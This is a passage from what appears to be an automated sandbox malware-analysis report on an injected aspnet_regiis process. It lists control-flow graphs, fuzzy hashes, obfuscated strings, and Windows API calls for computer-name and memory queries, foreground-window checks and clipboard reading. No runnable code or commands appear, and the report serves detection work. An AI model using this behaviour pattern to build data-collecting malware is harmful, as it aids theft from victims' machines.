523->529 530 2466bb5-2466bbd call 24483f0 523->530 531 2466bc0-2466bcc 523->531 525->523 525->525 529->530 530->531
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: I=[;$\]$k8i$sq$wu
                                                                    • API String ID: 0-747998150
                                                                    • Opcode ID: 580b738780a250b737b2de30fdddb06286f81d937b907374c0c194b685a4d755
                                                                    • Instruction ID: e61ba904dd6f579865f373b978278442f3e2dba8bf661f28f3268edeb1323a5d
                                                                    • Opcode Fuzzy Hash: 580b738780a250b737b2de30fdddb06286f81d937b907374c0c194b685a4d755
                                                                    • Instruction Fuzzy Hash: C2D1B6B05183408FD7109F69E89162FBBF4EB82758F048A2DF9958B351E778C909CB83

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 534 2448c70-2448c81 call 247e700 537 2448e47-2448e49 ExitProcess 534->537 538 2448c87-2448c9f SHGetSpecialFolderPathW call 2477a70 534->538 541 2448ca5-2448cc3 GetCurrentThreadId 538->541 542 2448e42 call 247fa10 538->542 543 2448cc5 541->543 544 2448cc7-2448cd2 541->544 542->537 543->544 546 2448cd4 544->546 547 2448cd6-2448ce5 544->547 546->547 548 2448ce7 547->548 549 2448ce9-2448cf4 547->549 548->549 550 2448cf6 549->550 551 2448cf8-2448da2 GetCurrentProcessId GetForegroundWindow 549->551 550->551 552 2448da4-2448e14 551->552 553 2448e1e-2448e36 call 244a020 551->553 554 2448e16-2448e18 552->554 555 2448e1a-2448e1c 552->555 553->542 558 2448e38 call 244d2b0 553->558 554->555 555->553 560 2448e3d call 244b930 558->560 560->542
                                                                    APIs
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02448C92
                                                                    • GetCurrentThreadId.KERNEL32 ref: 02448CA5
                                                                    • GetCurrentProcessId.KERNEL32 ref: 02448CF8
                                                                    • GetForegroundWindow.USER32 ref: 02448D9A
                                                                    • ExitProcess.KERNEL32 ref: 02448E49
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 4063528623-0
                                                                    • Opcode ID: f290e80cf37ce84e27e4f150575dbf2c79f58387bd4a46664ef7f07cf2cd205a
                                                                    • Instruction ID: 162c3273e57c8990811854247e461bcc2da09baf139da0a8afd233ce6b1b7a74
                                                                    • Opcode Fuzzy Hash: f290e80cf37ce84e27e4f150575dbf2c79f58387bd4a46664ef7f07cf2cd205a
                                                                    • Instruction Fuzzy Hash: 2A417F33B4071C1BE714AABADC5A39BB6C65BC4614F0A842EDD84DF391FE688C058684

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 562 246e398-246e3c5 563 246e3d0-246e411 562->563 563->563 564 246e413-246e41f 563->564 565 246e421-246e427 564->565 566 246e43b-246efbf 564->566 567 246e430-246e439 565->567 569 246efc0-246f02e 566->569 567->566 567->567 569->569 570 246f030-246f039 569->570 571 246f05d 570->571 572 246f03b-246f044 570->572 574 246f060-246f06c 571->574 573 246f050-246f059 572->573 573->573 575 246f05b 573->575 576 246f081-246f0a0 call 2481930 574->576 577 246f06e 574->577 575->574 581 246f0a5-246f0c4 GetPhysicallyInstalledSystemMemory call 2461050 576->581 578 246f070-246f07d 577->578 578->578 580 246f07f 578->580 580->576 583 246f0c9-246f0ef 581->583 584 246f0f0-246f132 583->584 584->584 585 246f134-246f16f 584->585 586 246f170-246f195 585->586 586->586 587 246f197-246f1a0 586->587 588 246f1a2-246f1ab 587->588 589 246f1bd 587->589 590 246f1b0-246f1b9 588->590 591 246f1c0-246f1ca 589->591 590->590 592 246f1bb 590->592 593 246f1cc-246f1cf 591->593 594 246f1db-246f1e7 591->594 592->591 595 246f1d0-246f1d9 593->595 596 246f1fb-246f25b 594->596 597 246f1e9-246f1ef 594->597 595->594 595->595 599 246f260-246f2ad 596->599 598 246f1f0-246f1f9 597->598 598->596 598->598 599->599 600 246f2af-246f2b8 599->600 601 246f2ba 600->601 602 246f2cb-246f2d7 600->602 603 246f2c0-246f2c9 601->603 604 246f2eb-246f380 602->604 605 246f2d9-246f2df 602->605 603->602 603->603 606 246f2e0-246f2e9 605->606 606->604 606->606
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: hzQ$A0*#$_mQ#
                                                                    • API String ID: 0-649192675
                                                                    • Opcode ID: 4be9e114f4826ca406262260a5353c8dbe1d7b16e8df7351e7b6fcdbe6872f53
                                                                    • Instruction ID: de886982b22257f0782294d8bc65c49406540ef0d207c331a651ccc23139c871
                                                                    • Opcode Fuzzy Hash: 4be9e114f4826ca406262260a5353c8dbe1d7b16e8df7351e7b6fcdbe6872f53
                                                                    • Instruction Fuzzy Hash: 43D1E871605B818FD72ACF35C4647B3BBD2AF96204F0889AEC4DB8BB42D7796409CB11

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 607 246ef87-246efbf call 2474ef0 call 24483f0 613 246efc0-246f02e 607->613 613->613 614 246f030-246f039 613->614 615 246f05d 614->615 616 246f03b-246f044 614->616 618 246f060-246f06c 615->618 617 246f050-246f059 616->617 617->617 619 246f05b 617->619 620 246f081-246f0c4 call 2481930 GetPhysicallyInstalledSystemMemory call 2461050 618->620 621 246f06e 618->621 619->618 627 246f0c9-246f0ef 620->627 622 246f070-246f07d 621->622 622->622 624 246f07f 622->624 624->620 628 246f0f0-246f132 627->628 628->628 629 246f134-246f16f 628->629 630 246f170-246f195 629->630 630->630 631 246f197-246f1a0 630->631 632 246f1a2-246f1ab 631->632 633 246f1bd 631->633 634 246f1b0-246f1b9 632->634 635 246f1c0-246f1ca 633->635 634->634 636 246f1bb 634->636 637 246f1cc-246f1cf 635->637 638 246f1db-246f1e7 635->638 636->635 639 246f1d0-246f1d9 637->639 640 246f1fb-246f25b 638->640 641 246f1e9-246f1ef 638->641 639->638 639->639 643 246f260-246f2ad 640->643 642 246f1f0-246f1f9 641->642 642->640 642->642 643->643 644 246f2af-246f2b8 643->644 645 246f2ba 644->645 646 246f2cb-246f2d7 644->646 647 246f2c0-246f2c9 645->647 648 246f2eb-246f380 646->648 649 246f2d9-246f2df 646->649 647->646 647->647 650 246f2e0-246f2e9 649->650 650->648 650->650
                                                                    APIs
                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0246F0AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                    • String ID: hzQ$A0*#$_mQ#
                                                                    • API String ID: 3960555810-649192675
                                                                    • Opcode ID: f4b23709a365f10118cd6b76cd16a87f7e1a1f62e50d702f80f9d5be26480923
                                                                    • Instruction ID: 96013c0902ae73e8970757afda0a50a0d5e0f0385b760479ec94299f8fabe8f2
                                                                    • Opcode Fuzzy Hash: f4b23709a365f10118cd6b76cd16a87f7e1a1f62e50d702f80f9d5be26480923
                                                                    • Instruction Fuzzy Hash: 8EB1C571604B418FD739CF39C4607B3BBE2AF96204F19896EC0DB8BA42D77A64098B51

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 753 246f3ed-246f448 call 2481930 GetComputerNameExA 756 246f450-246f4a7 753->756 756->756 757 246f4a9-246f4b2 756->757 758 246f4b4-246f4bf 757->758 759 246f4cd 757->759 760 246f4c0-246f4c9 758->760 761 246f4d0-246f4dc 759->761 760->760 762 246f4cb 760->762 763 246f4de-246f4e4 761->763 764 246f4fb-246f55a GetComputerNameExA 761->764 762->761 765 246f4f0-246f4f9 763->765 766 246f560-246f595 764->766 765->764 765->765 766->766 767 246f597-246f5a0 766->767 768 246f5a2-246f5a8 767->768 769 246f5bb-246f5c7 767->769 770 246f5b0-246f5b9 768->770 771 246f5db-246f63b 769->771 772 246f5c9-246f5cf 769->772 770->769 770->770 775 246f640-246f667 771->775 773 246f5d0-246f5d9 772->773 773->771 773->773 775->775 776 246f669-246f672 775->776 777 246f674-246f67f 776->777 778 246f68d 776->778 779 246f680-246f689 777->779 780 246f68f-246f69b 778->780 779->779 781 246f68b 779->781 782 246f69d-246f6a3 780->782 783 246f6bb-246f71a call 2481930 780->783 781->780 785 246f6b0-246f6b9 782->785 788 246f720-246f73a 783->788 785->783 785->785 788->788 789 246f73c-246f745 788->789 790 246f747-246f74f 789->790 791 246f75b-246f76b 789->791 792 246f750-246f759 790->792 793 246f880-246f8c9 791->793 794 246f771-246f77b 791->794 792->791 792->792 796 246f8d0-246f8fb 793->796 795 246f780-246f78a 794->795 797 246f7a0-246f7a6 795->797 798 246f78c-246f791 795->798 796->796 799 246f8fd-246f90b 796->799 801 246f7d0-246f7df 797->801 802 246f7a8-246f7ab 797->802 800 246f830-246f834 798->800 803 246f90d-246f913 799->803 804 246f92b-246f931 call 2473610 799->804 808 246f836-246f83e 800->808 805 246f7e1-246f7e4 801->805 806 246f84a-246f852 801->806 802->801 809 246f7ad-246f7c2 802->809 810 246f920-246f929 803->810 812 246f936-246f955 804->812 805->806 811 246f7e6-246f82f 805->811 806->808 814 246f854-246f857 806->814 808->793 813 246f840-246f842 808->813 809->800 810->804 810->810 811->800 813->795 815 246f848 813->815 816 246f87c-246f87e 814->816 817 246f859-246f87a 814->817 815->793 816->800 817->800
                                                                    APIs
                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0246F41E
                                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0246F51B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: ComputerName
                                                                    • String ID: Y)|z
                                                                    • API String ID: 3545744682-2475117699
                                                                    • Opcode ID: 98966fa27bd218655be42405ecca47b0313d3113b6fb8d2b6c23f9e43e06816e
                                                                    • Instruction ID: e9c4110944a63973f4d869dab5902af7a3f5cf3634be398a85eb3db0f1908975
                                                                    • Opcode Fuzzy Hash: 98966fa27bd218655be42405ecca47b0313d3113b6fb8d2b6c23f9e43e06816e
                                                                    • Instruction Fuzzy Hash: 21E11A20615B818EE725CF39C4547B3BBE19F57304F08999EC0EB87782D779A10ACB62

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 862 244da8d-244dad2 call 24754c0 call 2449ae0 CoUninitialize 867 244dae0-244db0e 862->867 867->867 868 244db10-244db3b 867->868 869 244db40-244db76 868->869 869->869 870 244db78-244dbe9 869->870 871 244dbf0-244dc39 870->871 871->871 872 244dc3b-244dc4c 871->872 873 244dc4e-244dc5f 872->873 874 244dc6b-244dc73 872->874 875 244dc60-244dc69 873->875 876 244dc75-244dc7a 874->876 877 244dc8d 874->877 875->874 875->875 878 244dc80-244dc89 876->878 879 244dc91-244dc9e 877->879 878->878 880 244dc8b 878->880 881 244dca0-244dca7 879->881 882 244dcbb-244dcc3 879->882 880->879 883 244dcb0-244dcb9 881->883 884 244dcc5-244dcc6 882->884 885 244dcdb-244dce5 882->885 883->882 883->883 886 244dcd0-244dcd9 884->886 887 244dce7-244dceb 885->887 888 244dcfb-244dd07 885->888 886->885 886->886 889 244dcf0-244dcf9 887->889 890 244dd21-244de4f 888->890 891 244dd09-244dd0b 888->891 889->888 889->889 893 244de50-244de8e 890->893 892 244dd10-244dd1d 891->892 892->892 894 244dd1f 892->894 893->893 895 244de90-244debb 893->895 894->890 896 244dec0-244dedf 895->896 896->896 897 244dee1-244df0b call 244b960 896->897 899 244df10-244df2a 897->899
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID: ~
                                                                    • API String ID: 3861434553-1707062198
                                                                    • Opcode ID: e508596f480d3aac56f4816879aaed0947f4c07fe01637f97d6ab2d153d1b7d8
                                                                    • Instruction ID: c858f3d12c55ca88d5a1a27e33dbaa9d74d8877cb79dc2a1e24aea7f16032f11
                                                                    • Opcode Fuzzy Hash: e508596f480d3aac56f4816879aaed0947f4c07fe01637f97d6ab2d153d1b7d8
                                                                    • Instruction Fuzzy Hash: 6FB11E7590D3D18AE334CF29C4983ABBBE1AFD6304F18895DD4D95B342DB78810ACB92
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(0247D9CC,?,00000004,?), ref: 0247FAEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0247D250
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 842e99023ff5890d6f1b30f0b7e0b908fbbb051464dfffe9abbb6b27324044b7
                                                                    • Instruction ID: 0fd0abeb773f975ef675990f59d43639ae42356d2dbd4aff2a71cde3c243727a
                                                                    • Opcode Fuzzy Hash: 842e99023ff5890d6f1b30f0b7e0b908fbbb051464dfffe9abbb6b27324044b7
                                                                    • Instruction Fuzzy Hash: 4A016D31E5C150CFD30D5B38EC6256F7B52EB96714F14197CD882A7654C7354C11CB85
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(B11B8F15,00000000,03020900), ref: 0244A0EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 2f796dec3994d11d035fed5fa6c7cb43499b7a65fa845482c747182e3b67816d
                                                                    • Instruction ID: 693be99f697d96373f05b97f4807006dde21b670d2951bd45a33dda7e42fa5fa
                                                                    • Opcode Fuzzy Hash: 2f796dec3994d11d035fed5fa6c7cb43499b7a65fa845482c747182e3b67816d
                                                                    • Instruction Fuzzy Hash: 6411243029D3A04BC3049B30C8A57AF7BE5EBE6308F18492DE1D147341C77854058B62
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: BlanketProxy
                                                                    • String ID:
                                                                    • API String ID: 3890896728-0
                                                                    • Opcode ID: d52ae81aeb7cfffa5d43936da31b3d0f88c3608a865cc2fc985fc89c3d1bfa21
                                                                    • Instruction ID: 1c8c85b802da8fc3ac02cb5145ab2413fd1cded9150dee1d8dc9b0164637f780
                                                                    • Opcode Fuzzy Hash: d52ae81aeb7cfffa5d43936da31b3d0f88c3608a865cc2fc985fc89c3d1bfa21
                                                                    • Instruction Fuzzy Hash: E7F0F9746193418FD394DF14C4A875ABBE1BBC5308F04C91CE4888B384DBB59548CF82
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: BlanketProxy
                                                                    • String ID:
                                                                    • API String ID: 3890896728-0
                                                                    • Opcode ID: 668d602f08c44922295b6a6b219a07848ab8c6892e4afc46480a2d797e0888e7
                                                                    • Instruction ID: ebbb06e5930391569d33beace929bcee1f530d5b32d1f063a74ad3b897f90c27
                                                                    • Opcode Fuzzy Hash: 668d602f08c44922295b6a6b219a07848ab8c6892e4afc46480a2d797e0888e7
                                                                    • Instruction Fuzzy Hash: 09F0DAB4509701CFD354DF28C0A8B1ABBF1FB89304F01880CE4958B3A0DBB6A948CF82
                                                                    APIs
                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0244D2F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeSecurity
                                                                    • String ID:
                                                                    • API String ID: 640775948-0
                                                                    • Opcode ID: 4cd2de2884dbd651e49541c52e36f280d6f5dcfb9079882711074541be35b55b
                                                                    • Instruction ID: 7160f0dbaeb92353b59824c0ffc2d0adf5a7cf5776d6f925893b2766642d6b0e
                                                                    • Opcode Fuzzy Hash: 4cd2de2884dbd651e49541c52e36f280d6f5dcfb9079882711074541be35b55b
                                                                    • Instruction Fuzzy Hash: 58E01731BE530967FA684518EC07F4822425384B21F7C8618F311FE6C8D9B8B411450A
                                                                    APIs
                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0244D2C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: 4607a0a906ab8e84487b80c5928d7f8884c5b6a9547db3a0fb4a4c4d87ac4b8d
                                                                    • Instruction ID: bbedc9798babe48737c41959ae6d5af3fde226d679932c479331fe1e808b034d
                                                                    • Opcode Fuzzy Hash: 4607a0a906ab8e84487b80c5928d7f8884c5b6a9547db3a0fb4a4c4d87ac4b8d
                                                                    • Instruction Fuzzy Hash: 79D0A730DE46486FD24CB66DEC0FF1E3A6C9342765FC0061DF6A2CA1C1D9506D20C666
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0247D19E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 1db9b7a08d4538535316219767be6a4e79d81b9c860e3d03c071c2acbf331a2d
                                                                    • Instruction ID: 0840b8421c1d1dc580eb421c2e0bf32b763b5fb2a0be1f347dc07f1aa0823b7c
                                                                    • Opcode Fuzzy Hash: 1db9b7a08d4538535316219767be6a4e79d81b9c860e3d03c071c2acbf331a2d
                                                                    • Instruction Fuzzy Hash: 0FC04C36A90009AEDF151E84FC05BC8BB21FB54365F104062F6185A061C23255759B80
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                    • String ID: C$C$E$F$J$M$T$[$^$_$x
                                                                    • API String ID: 2832541153-1009912999
                                                                    • Opcode ID: b8fc02f33cc1de564ff0e56cdd347a60ab4f979de46bf67c5faa411d2b036398
                                                                    • Instruction ID: 389cc54561ab9c6ba0522a486853b26ba3e88c2fa92602ef01c94641958cbfdc
                                                                    • Opcode Fuzzy Hash: b8fc02f33cc1de564ff0e56cdd347a60ab4f979de46bf67c5faa411d2b036398
                                                                    • Instruction Fuzzy Hash: 7A41717150C7818FD300EF78D88835FBFE1AB91215F49492DE9D58B382D6B98589CB93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
